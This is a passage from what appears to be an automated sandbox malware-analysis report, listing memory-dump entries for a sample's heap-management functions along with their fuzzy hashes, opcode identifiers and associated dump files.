                                      • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                      APIs
                                      • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                      • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                      • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                      • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710